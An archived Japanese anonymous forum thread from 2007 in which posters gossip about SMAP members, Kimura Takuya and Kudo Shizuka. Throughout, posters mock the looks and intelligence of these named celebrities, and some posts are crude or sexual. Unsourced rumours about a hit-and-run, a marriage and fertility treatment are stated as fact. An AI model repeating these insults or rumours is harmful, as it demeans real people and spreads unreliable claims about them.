またキモタコ笑わしてくれるねw小学生が山手線の駅名全部言えます〜みたいなw質問した谷原章介の
笑うに笑えない顔が見たかったなwきっと、こいつホントに真性の馬鹿だな〜って思ったねキット!
キモタコはスタッフの名前なんかよりドラマの内容を理解してるのか?そっちの方が気になる

641 :可愛い奥様:2007/01/13(土) 21:18:44 ID:SwBF4X1Y
原作読めないよね。この人。トットちゃんに「本は読むの?」と聞かれて「僕にとって本は人です」と答えてたもの。

642 :可愛い奥様:2007/01/13(土) 22:03:45 ID:/z6KN8zT
キムタクすごいブヨブヨだよね。このブヨブヨの体見せられて静香は気持ち悪くないのか。
http://www.geocities.com/gimgabinko/05consb14.jpg
http://ime.nu/i87.photobucket.com/albums/k122/kamegirl/uuuuuuuu.jpg
http://ime.nu/ime.st/i32.photobucket.com/albums/d6/katagirigirl/woweee9.jpg

646 :可愛い奥様:2007/01/14(日) 01:06:28 ID:BR8j0OYl
スタッフの名前覚えるより役作りをしたほうが役者として大事なんじゃないでしょうか?
役作りをしないのが信念のようですが。ADじゃないんだから名前まで覚えなくてもw
ミスしたら一生名指しで文句言われるスタッフかわいそう。

648 :可愛い奥様:2007/01/14(日) 02:03:29 ID:zoj3AexY
キムタクは体もそうだが、顔がブヨブヨで気持ち悪い。30過ぎのする顔かって。
昔、グッドラックの番宣で柴崎コウと一緒になって内山理名をイジメてたよね。今頃ガクブル?

651 :可愛い奥様:2007/01/14(日) 12:26:41 ID:dZEvUHQf
私も思ってた。東ってジャニの重役になるんだよね?たしか。風向きわるいね。自業自得だけど。
スマスマで「ちょっと言葉を拝借させていただきますが・・・」って言ってた。「拝借しますが」でよくね?
なぜわざわざ間違った使い方をするのか?言葉遣いがおかしいのは今に始まった事ではないがwww

85 :スマ姐さん:2007/01/14(日) 17:50:59 ID:83sq+zCL
200枚も部屋に貼れません。

86 :スマ姐さん:2007/01/14(日) 20:52:46 ID:rNc0F7QJ
覚せい剤取締法違反(使用)の罪に問われた高知県春野町甲殿、元プロ野球投手、野村貴仁被告(37)
の初公判が19日、高知地裁(片多康裁判官)で行われ、同被告が日本での現役時代、「グリーニー」
と呼ばれる興奮剤を服用していたことを明らかにした。同被告が初めて公の場で認めたことで、球界
の薬物疑惑が再燃する可能性が出てきた。グリーニーは覚せい効果のある興奮剤アンフェタミンの一種。
錠剤が緑色(グリーン)であることから、こう呼ばれている。疲労を忘れさせ、集中力を増すなどの効
果があるが、ほとんどの国で違法とされている。同被告はオリックス在籍時代、チームの外国人選手の
すすめで口にしはじめ、同僚選手たちにも分け与えていたという。メジャーでも深刻な薬物問題を受け、
日本プロ野球界も今年から、抜き打ちでドーピング検査を実施している。
グリーニーに関しては昨年8月、“10人近いロッテの選手が服用している”と週刊朝日が指摘。
ボビー・バレンタイン監督(56)と瀬戸山隆三球団代表(52)が聞き取り調査を実施したうえで、
「そのような事実は一切ない」と完全否定していた。現時点では使用されていないと思われるグ
リーニーだが、過去に現役選手が国内で使用していたという告白は、改めて球界に衝撃を与えることになりそうだ。
ttp://www.iza.ne.jp/news/newsarticle/sports/npb/32202/

87 :スマ姐さん:2007/01/14(日) 22:40:21 ID:CQ04evzi
木村のドラマ見た?周りに対する熱さが素の木村と重なって見えた。

88 :スマ姐さん:2007/01/15(月) 01:55:51 ID:/2DpK8JJ

日本マーケットに中居正広が切り開いた、「仕切れるMCバラドル」の路!
もはや今はブサチビ亀梨MCが猛追してるが、中居(美形)と違ってブサなので厳しい!

むしろ地味な裏方バラエティ畑の意で、国分太一に等しい亀MC。
でも中居がかつて務めたロート目薬Ziの広告、頑張ってます!

※主題歌・小田和正「最後の恋」16.8%>曲・小田和正「たったひとつの糞」11%(死)



89 :スマ姐さん:2007/01/15(月) 07:08:05 ID:3fhYJHQ1
華麗なるいのしし・華麗なる肖像画・華麗なる金のロボ鯉にワロタが・・

90 :スマ姐さん:2007/01/15(月) 19:16:23 ID:p2f48rRq

二児の父親キムタクの口癖


「ラブショーン」

「ものづくり」

「一所懸命」

「先見の目」

「デジル」


91 :スマ姐さん:2007/01/15(月) 21:49:44 ID:pBW0J4ot
SMAPキモイキモイ
出目金ナンバー1 なかい
豚の鼻 キモイ顔ナンバー1 ごろう
くちびる手術ナンバー1かとり
めつきがロリパパ きむら
顔から臭いオーラ もり


後の方はゴミに出して下され(^o^)/ 回答無用です。

92 :ともこ:2007/01/16(火) 18:55:56 ID:Rv7JnwDi
はじめまして〜
ともこです☆


93 :スマ姐さん:2007/01/17(水) 13:20:55 ID:gqAHocco
602 :自治スレで新ローカルルール議論中です :2007/01/14(日) 22:33:01 ID:PrKCvmTW
キムタク一人浮いてたな。キムタクにはやはり敷居が高かったようだ・・・残念 合掌

604 :自治スレで新ローカルルール議論中です :2007/01/14(日) 22:34:02 ID:4xLAs/Cu
キムの役は上川隆也なんか良いと思った。

608 :自治スレで新ローカルルール議論中です :2007/01/14(日) 22:35:32 ID:eLACMuHh
あーたしかに鉄平は若い上川のイメージだな。

609 :自治スレで新ローカルルール議論中です :2007/01/14(日) 22:36:44 ID:5mI28PcS
とらわれないで見たら普通に次回も見たいドラマだと思ったけど、確かに鉄平役はもっと他に適役はいたと思う。
木村拓哉のあのよくある横向きのはにかんだようなフッっとする演技。これまでの月9なんかには通用しただろうけど
今回の重厚な豪華キャストドラマには絶対にミステイクだと思います。それだけでドラマの質が落ちたと思いました。

614 :自治スレで新ローカルルール議論中です :2007/01/14(日) 22:39:17 ID:fJP+Svg0
鉄平が織田裕二なら自然だったな。キムタクから育ちの良さが感じられない。義理も含めて
兄妹からは感じられるのに。キムタクの糞っぷりで唐沢の評価がグンと上がった気がする。

626 :自治スレで新ローカルルール議論中です :2007/01/14(日) 22:44:10 ID:eLACMuHh
織田でもいいね。とにかくキムタクはキムタクから脱皮する気があるんなら、まず滑舌の特訓しろ。
腹から声を出せ。ただでさえジャニ出のチビオヤジが出来る役なんて限られてくるのに、
あの滑舌では時代劇にも使えない。最近の仕事見てると来年の大河主役あたりやりそうで嫌な予感。

628 :自治スレで新ローカルルール議論中です :2007/01/14(日) 22:44:24 ID:qPqrSxv1
絶望的にキムタクは、かつぜつが悪くないか?さ行がしゃしぃしゅしぇしょぉに聞こえる。
若者喋りならいいけどこういうドラマではちょっと… 発声からやり直してこいと言いたい。

641 :自治スレで新ローカルルール議論中です :2007/01/14(日) 22:49:52 ID:dWigLaJZ
キムタク演技は変えられないのなら、せめて髪型くらいちゃんとしろよと。
さすがにロン毛はまずいからただ短くしたってだけだろ。色も黒く染めろよ。

94 :名無しさん:2007/01/17(水) 20:47:07 ID:J8HjMKF3
すいません
ありがとうの着うたってどこで取れますか??

95 :スマ姐さん:2007/01/18(木) 00:49:58 ID:bTNpopRS
554:スマ姐さん :2007/01/14(日) 17:04:28 ID:KdxlA+Z2
ツヨシさんおんぶして〜♪ひゅーひゅー
ツヨシさんのおんぶは最高ーさー 居エーーーー意!!!433:スマ姐さん :2007/01/16(火) 00:32:27 ID:wo2Ej9kX
タ・チ・ツヨシさん♪
タ・チ・ツヨシさん♪

あなたは私の宝物〜 だーれーにーも あーげナイッ☆”
鳩に乗って旅をしようと言ってくーれたよねん♪
そのお誘い・・いつかお受けしたシーーーますぅわぁあああああああああああ

96 :スマ姐さん:2007/01/18(木) 05:22:10 ID:H5hdolKi
ぶっすまって書いてる人鏝になってるけどわざと?

97 :スマ姐さん:2007/01/18(木) 07:06:07 ID:gEULsJAK
昔さあ!スマップのチケットを下級生から脅しとった中高女がいたわよね。ヲタの代表ね。アンチが悪い事するならともかく? ヲタだもんね(^o^)/ 偉そうな事いっても裏じゃ何やってるかわかったもんじゃ無いわね???


98 :スマ姐さん:2007/01/18(木) 16:06:33 ID:qpln4D7H
952 :可愛い奥様:2007/01/18(木) 05:13:50 ID:Rnwgf2CQ
さんちゃんねる初めて見てみた。小西真奈美は調子良くて腹黒だと思ったけど3人して小西の車の車種
しつこく聞きすぎ。ヲタやマスコミ対策や今後狙ってるであろう車のCM考えたらペラペラ言えないだろうに。
草履が頭掻きながら「自分の乗ってる車も分かんないわけぇ」とイヤミたっぷりに言ってるのを見て
やっぱり草履は草履だわ、と妙に納得した。そういう草履はテレビで乗ってる車が言えるのかね?
CMの国産軽に乗ってるわけないと思うけど。

957 :可愛い奥様:2007/01/18(木) 07:20:26 ID:iutksKdA
あれはひどかった。なんであんなにエラそうなの?駆動って。
人を馬鹿にしたようなししゃべりだし。飯島も駆動もビジュアルが不潔っぽいし、なんの魅力もない。

960 :可愛い奥様:2007/01/18(木) 08:06:30 ID:5gHzE0is
飯島直子もテレビで駆動とつるんだって、何も良い事ないのにね。むしろ超マイナス。
事務所は止めないの?これからは底意地の悪さで売っていくのか。工藤静香は自分の性格の悪さを
アピールする為にやってるんだよね?そうとしか思えない。さんまも工藤静香は「喋る内容殆どが悪口」
って言ってたのに喋らせ放題だね。解ってやらせてるのかもね。w

962 :可愛い奥様:2007/01/18(木) 08:16:34 ID:o1WCzK+d
工藤の「車種訊いてんだよ!」の下品な口調には笑いを通り越して殺意が芽生えた。
「二階から○○」も「河童の○○」ことわざも知らないし「強ち」も読めない
低脳ヤンキーのくせに黙ってろと思った。あの番組はもう二度と見ない

963 :可愛い奥様:2007/01/18(木) 08:21:34 ID:yXxrEpFp
秋刀魚、草履の番組なんて誰が見るんだって感じ。この2人本当に嫌い。
3月いっぱいで終わればいいのに。草履の口元見るとハチエモン思い出す
ロン毛のことの話で秋刀魚が「あなたの身近な人が流行らせた」みたいなこと言ったとき
「似合ってるからいいの〜(はあと)」と言ってるとこを偶然チャンネル変えたとこで見てしまった。

966 :可愛い奥様:2007/01/18(木) 08:29:19 ID:CLP2fiF5
自分もちょうど見ちゃったよ。たまたま見て罪悪感。キモ蛸ファンから叩かれるだろうね


99 :スマ姐さん:2007/01/18(木) 16:15:25 ID:gEULsJAK
スマップの板は最低ランクね!まず放置出来ない奴らばっかり。すぐ通報。ほんとのなのにムキになりすぎ。
あたしの広場は爺 婆だから、みんなスルウよ!

ヲタ!セックス出来ない欲求不満でも我慢を覚えろ!オナニーで我慢しろ!安置スルウを覚えろ! いいな!


100 :スマ姐さん:2007/01/18(木) 20:45:55 ID:9o7ovZ1v
中居君がいつもしてるネックレスってどこの?

101 :スマ姐さん:2007/01/19(金) 03:30:40 ID:nVp7mjTm
スマップ5人の実力
 
木村→顔はイケメン、歌もSMAP内では上手いほうだが歌手としてはなんの魅力もない。歌い方、演技、トーク、全てにおいてカッコつけのナルシスト。やけに態度がでかい。
 
中居→SMAP内で一番バラェティとしての人気が高いが極度ににうざい為嫌いな人も多い。顔はイマイチ。歌と演技は最低。特に歌は素人に負ける程の糞。歌手としてのセンス0。
 
稲垣→他のメンバーが人気強い為どうしても地味というイメージが強い。知識が豊富なイメージだが数年前にひき逃げをした事がある糞。歌、演技、顔、どれもSMAP内では平均的。
 
草なぎ→演技は上手いがそれ以外は、はっきり言って糞クラス。歌、トーク、顔、はSMAPの中でも低レベル。稲垣同様に地味だがバラェティとしてのセンスが無いわけではない。
 
香取→歌、顔、トークにおいて基本的には悪くない。バラェティとしての素質もあるがやはり調子に乗りやすいのでうざいと思う人が多い。演技は特に上手いわけではない。

102 :スマ姐さん:2007/01/19(金) 05:53:35 ID:mBc23pTC
>>101
なのに5スマが大好きだなんて相当Sな姐さんだな(・∀・)ニヤニヤ

103 :スマ姐さん:2007/01/19(金) 06:50:40 ID:CGPQao9i
>>101
一見貶めてる様に見えて、よく読めばこれ超褒めてるじゃんw
自分恥ずかしくてさすがにここまであからさまに褒めらんないよ。
そんなに5スマ好きなのか(・∀・)ニヤニヤ


104 :スマ姐さん:2007/01/19(金) 08:38:58 ID:3noat1yY
>>103 誉められてないメンの方が多いが? イチオシがバレルぞ。

105 :スマ姐さん:2007/01/19(金) 10:32:24 ID:XnUY6/UY
木村嫁はTVでの発言を考えてからはなせ!
木村のイメージがドンドン悪くなる
引いてはスマのイメージもだ!

106 :スマ姐さん:2007/01/19(金) 11:47:35 ID:hPHAAAJe
木村の嫁はあんまりテレビに出ないほうがいいね。
家にいたほうが家庭を守るいい奥さんと評判が良くなるのに。
絵の個展をたまにやるくらいでいいのに。


107 :スマ姐さん:2007/01/19(金) 14:11:23 ID:SVL7YxD4
中居ってさラジオや雑誌とかでドラマも映画も話こないって
そんな愚痴ばっかいっててみっともないと思わないのかな

やっと来た話も時間ですよなんてリメイクていうか企画物だったし
それもなくなっちゃって運にも見放されたってやつ?

だいたい収録期間中にブクブクブクブク太っていく俳優なんて
誰も使いたくないのは当たり前
セリフ回しは下手だし首振る癖は直せないし

ドラマの仕事がしたいなんてよくもまあ恥ずかしげもなくいえるよ
オファーがあるわけないじゃん

108 :スマ姐さん:2007/01/19(金) 14:47:00 ID:l81wc+27
恥ずかしげもなくスレ違いの長文書く神経もどうかと思うけどね

109 :スマ姐さん:2007/01/19(金) 16:22:42 ID:XWF2xXcu
スレ違い?

110 :スマ姐さん:2007/01/19(金) 16:40:29 ID:Wpv0TTN/
昔の香取に戻って欲しいよ。良い役を演じてたよ。
最近はなんか違う

111 :スマ姐さん:2007/01/19(金) 17:47:28 ID:UsC/bcRa
ID:SVL7YxD4そのうち驚くで〜〜〜


112 :スマ姐さん:2007/01/19(金) 17:55:22 ID:KPRh2SIZ
ええぇ何それ?気になるぅ(ToT)この〜木なんの木 気になる木~

113 :スマ姐さん:2007/01/19(金) 17:57:38 ID:9d7Qztub
中居って中野美奈子と結婚するらしいぞ。
今日の新聞でおっさんが読んでるのんみたからマジ。

114 :スマ姐さん:2007/01/19(金) 18:47:46 ID:V/EnBPp+
737 :可愛い奥様:2007/01/18(木) 15:51:14 ID:pq8LtYlU
キムタク Love SeanS とか書いちゃうくらいだから賢く見られたくてしょうがないのかな? 典型的な馬鹿。

738 :可愛い奥様:2007/01/18(木) 17:04:06 ID:+xKUKR0s
賢く見せようと頭を回転させるんだけど、まぁ遅い。それが言ってることがgdgdで結局意味不明なことが多い。
知性がないなら、知識でカバーすればいいものを。その昔「世界に一つだけの花」が売れて、ニュース23に
スマップ全員で出たのを見たんだけど、筑紫さんにコメントを求められても小学生みたいなことしか、
この人言えなかった。なんか化けの皮が剥がれた気がした。ずっと前から見抜いていたナンシー関は改めてすげー。

741 :可愛い奥様:2007/01/18(木) 21:54:27 ID:xGZoe357
昔蛸がMステで自分のことを「ポエマー」って言ってたのを思い出した。詩人だと言いたかったんだろうが
詩人の英訳は「Poet」なのにw マイナーな単語だからウケ狙いでもあるまいし「詩人」って日本語で
言えばよかったのに。タモリも内心ヴァカにしてたと思うわ。

746 :可愛い奥様:2007/01/19(金) 08:15:07 ID:CLhMFve50
ナンシーの蛸たたきを初めて読んで やっと本当のこと言ってくれる人がでてきたと思い嬉しかった。
ナンシーはムンクについても的確に言い表してた。でもマスコミこぞって蛸マンセーしてる中、
堂々と蛸の真実を口にしたのはすごいと思う。それがまた的を射てるし。今でも蛸についての
コラム読むと納得してしまう。今の必死な蛸をナンシーの鋭い筆でぶった切ってほしかった。
本当に惜しい才能が失われたものだ。蛸が芸能界から去っても惜しくもなんともないけどな。

748 :可愛い奥様:2007/01/19(金) 10:58:00 ID:w2Rt84tpO
ナンシーは草履=長ネギ説を唱えてたね。
ナンシーは草履=「硫酸女」とも言ってたよ。今の「蛸さま」のメッキどころか地金までぼろぼろ状態を見るにつけ
ナンシーの洞察力に脱帽する。メッキ剥がれて地金も溶け出してる。地金ただのあほヤンキーの成長不良だった。
昨日のアメトークで、蛸の物真似したホリが客席に大ヒット中の武士の一分見たか聞いたら、
たった二人しか手を挙げなくてホリと宮迫たちが『ヤバイ!』って顔したのが笑えた

115 :スマ姐さん:2007/01/19(金) 18:58:36 ID:Qp8i1fKB
木村拓哉→顔デカ短足。本人もコンプレックスにしている。嫁はヒョットコ。
歌はうまいが演技はどのドラマも同じ。
怒りっぽいが歌は安定している。
たまにかっこいいしかなりオシャレ。

中居→チビハゲだが華奢でスタイルはいい。
センスがない。
演技は大体同じだが目力があるからかハマるとなかなか。
歌は下手というが、錯覚かしゃがれ感が調子のいい日は味があり心にしみる。
涙もろく心優しいが時に閻魔様。

吾郎→くせ毛、剛毛、ドルガバ、ニヒル。
剛→顔がザブングル。
Gパンマニアで肌が荒れやすく酒癖が悪い。演技はうまい。
慎吾→おちゃめで芸術的センスがあるが
自信家すぎるのが玉に瑕。ファッションも個性的でかわいい。
演技も歌もふつう。チンポというよりイナリがデカい。

116 :スマ姐さん:2007/01/19(金) 19:06:41 ID:V/EnBPp+
287 :可愛い奥様:2007/01/17(水) 22:29:26 ID:OC7Td9L5
油断してたら久々に被草履した。相変わらず夜の香りぷんぷんだった。さんまにロンゲはやらせたのあんたの
身近にいる人やんかと言われて「似合ってるからいいのぉ(はーと)」だと。蛸の顔思い出して吐きそうになった

288 :可愛い奥様:2007/01/17(水) 23:11:56 ID:mq8FxI2C
蛸は確かにロン毛の方が良かった。短くして、劣化したおばさん顔が目立って余計気持ち悪い!

289 :可愛い奥様:2007/01/17(水) 23:32:34 ID:k3I87KQ6
>似合ってるからいいのぉ(はーと) いい年したババァがテラキモス

292 :可愛い奥様:2007/01/18(木) 01:21:23 ID:dKCCJ7uh
相変わらず草履は自分より若くて綺麗な女優さんが大嫌いなんだねw

298 :可愛い奥様:2007/01/18(木) 14:38:08 ID:BzfhkmnI
さんちゃんねるで工藤がウィッグだか地毛の毛束をグネグネいじくりながら話してて汚らしかった。
飯島も単体なら可愛いおばちゃんなのに、工藤とくっつくとヤンキーの意地悪馬鹿女にしか見えない。

309 :可愛い奥様:2007/01/19(金) 01:54:59 ID:FcbNX51q0
キムタクと結婚してキムタクの子供産んで、芸能界でもそれなりにまだ席が残っていて
言いたい放題なんて勝ち組!ブスだし、相当好感度低い人だとは思うけど何か信者になりそうだわ。

318 :可愛い奥様:2007/01/19(金) 12:30:32 ID:jKWvZ7wn0
工藤静香は背筋がぞっとするくらい きつい。大きなお世話だがキムタクの趣味ほんと疑うわ

320 :可愛い奥様:2007/01/19(金) 15:55:23 ID:XeFYDcAO0
工藤静香はなんたって30歳になっての不妊治療の末のでき婚だもんね。
はずかしいったらないよ。よく堂々とテレビでバカを丸出しにしているものだ。

321 :可愛い奥様:2007/01/19(金) 17:36:55 ID:jKWvZ7wn0
なんたって男を落とすことしか脳のない女ですから。お手本になった参考書は映画「ナインハーフ」のキム・ベイシンガー
キムタクのファンになりノリピーに近づき、興味もないサーフィンやって数年かけて近づいた根気だけは凄い。

47 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)